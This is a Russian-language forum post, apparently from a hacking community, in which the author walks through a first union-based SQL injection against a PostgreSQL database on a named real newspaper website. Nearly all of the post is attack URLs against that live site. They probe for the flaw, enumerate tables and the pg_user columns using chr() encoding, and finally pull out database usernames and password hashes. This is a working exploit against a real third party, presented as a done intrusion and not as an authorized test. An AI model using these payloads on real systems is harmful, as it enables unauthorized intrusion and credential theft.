моя первая инъекция в PostgreSQL
сам сайт мне дал ещё давно
Constantine поэтому даже если боян, прошу не ругать.. просто это был самый короткий путь попробывать свои силы
нашёл:
Код:
http://www.chroniclejournal.com/includes/datafiles/obits_results.php?id=1'
столбцы:
Код:
http://www.chroniclejournal.com/includes/datafiles/obits_results.php?id=-1+union+select+1,null,null,null,null,null--
схема.таблес
Код:
http://www.chroniclejournal.com/includes/datafiles/obits_results.php?id=-1+union+select+null,TABLE_NAME,null,null,null,null+from+information_schema.tables--
хоть еденичка выводится в 1 всёравно table_name мы поставляем в 2.. ибо в 1 другой тип данных.
выбрали табличку: pg_user
выводим колонки:
Код:
http://www.chroniclejournal.com/includes/datafiles/obits_results.php?id=-1+union+select+null,COLUMN_NAME,null,null,null,null+from+INFORMATION_SCHEMA.COLUMNS+where+TABLE_NAME=chr(112)||chr(103)||chr(95)||chr(117)||chr(115)||chr(101)||chr(114)--
перевели в char ибо подругому нерааботет(в данном случае)
получаем:
Код:
passwd
usecatupd
useconfig
usecreatedb
usename
usesuper
usesysid
valuntil
выводим:
usename:
Код:
http://www.chroniclejournal.com/includes/datafiles/obits_results.php?id=-1+union+select+null,usename,null,null,null,null+from+pg_user--
passwd
Код:
http://www.chroniclejournal.com/includes/datafiles/obits_results.php?id=-1+union+select+null,passwd,null,null,null,null+from+pg_user--
объеденим:
Код:
http://www.chroniclejournal.com/includes/datafiles/obits_results.php?id=-1+union+select+null,usename||chr(58)||passwd,null,null,null,null+from+pg_user--